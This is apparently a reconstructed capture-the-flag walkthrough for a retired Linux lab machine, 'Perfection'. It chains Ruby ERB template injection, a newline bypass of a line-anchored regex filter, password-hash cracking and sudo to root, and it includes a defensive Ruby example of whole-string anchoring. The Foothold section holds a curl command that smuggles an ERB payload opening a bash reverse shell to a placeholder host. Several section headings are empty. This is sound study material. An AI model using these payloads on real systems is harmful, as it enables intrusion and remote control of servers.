
perfection

Linux · Easy · released 2024-03-02 · retired 2024-07-06

Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

Perfection is an Easy Linux box: Ruby/Sinatra grade calculator → SSTI in one of the inputs (newline bypass of the regex filter) → ERB template eval → RCE as susan. Privesc: SQLite password hashes + an email describing the password format {first}_{first_reversed}_{1..1B} → hashcat mask → susan’s password → sudo root.

The chain:

  1. Form blocks <%/%> in the weight field with re.match. Newline-prefix \n<%= ... %> slips past → ERB runs → reverse shell as susan.
  2. ~/Migration/wkstn.db → SHA256 hashes for staff.
  3. Email mentions password policy: name_emanReversed_INT(1..1e9).
  4. hashcat -m 1400 -a 3 hash 'susan_nasus_?d?d?d?d?d?d?d?d?d' → susan’s password.
  5. sudo -l → ALL → sudo -i → root.

Recon

22/tcp     OpenSSH
80/tcp     Sinatra grade calculator

Foothold — ERB SSTI

# the weight field is regex-filtered, but the check is effectively per-line (Ruby ^/$ anchor to line boundaries),
# so a value whose first line is clean passes even when the next line carries an ERB tag
# inject after a newline
curl -X POST http://perfection.htb/weighted-grade-calc \
   -d $'category1=A&grade1=10&weight1=1\n<%= `bash -c "bash -i >& /dev/tcp/<C2>/<p> 0>&1"` %>'
# reverse shell as susan
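Added illustration (not code from the box or from any walkthrough): why a Ruby regex anchored with ^ and $ is only a per-line check, and how \A/\z close the gap. The exact regex shape and the rendering helper are assumptions; the ERB payload used is benign.

```ruby
require 'erb'

# Constructed model of the filter described above. ^ and $ in Ruby match at
# line boundaries, so a multi-line value passes if any one line matches.
LINE_ANCHORED   = /^[0-9.]+$/     # vulnerable: per-line anchors
STRING_ANCHORED = /\A[0-9.]+\z/   # hardened: whole-string anchors (\z, not \Z, to reject a trailing newline)

# True when the field value satisfies the given pattern.
def weight_valid?(value, pattern)
  !(pattern =~ value).nil?
end

# Assumed rendering path: the raw field is interpolated into an ERB template
# after the filter. Returns nil if the filter rejects the value, otherwise the
# rendered text (which is where an accepted ERB tag gets evaluated).
def render_weight(value, pattern)
  return nil unless weight_valid?(value, pattern)
  ERB.new("Weight: #{value}").result(binding)
end

# Constructed inputs: a normal weight and a newline-prefixed, harmless ERB tag.
CLEAN    = "1"
SMUGGLED = "1\n<%= 6 * 7 %>"

if __FILE__ == $0
  puts render_weight(CLEAN, LINE_ANCHORED).inspect      # "Weight: 1"
  puts render_weight(SMUGGLED, LINE_ANCHORED).inspect   # "Weight: 1\n42"  (tag evaluated)
  puts render_weight(SMUGGLED, STRING_ANCHORED).inspect # nil (rejected)
end
```

The same \A/\z fix applies to every field the template touches, not just the weight; a trailing "\n" alone is enough to defeat a $-anchored check.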

Privesc — hashcat mask + sudo

$ sqlite3 ~/Migration/wkstn.db 'select * from users;'
... susan : <sha256>

$ hashcat -m 1400 -a 3 hash 'susan_nasus_?d?d?d?d?d?d?d?d?d'
... susan_nasus_413759210

$ sudo -l
(ALL : ALL) ALL
$ sudo -i
# root

Why each step worked

Counterfactuals

Source attribution

Reconstruction is grounded in:

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.
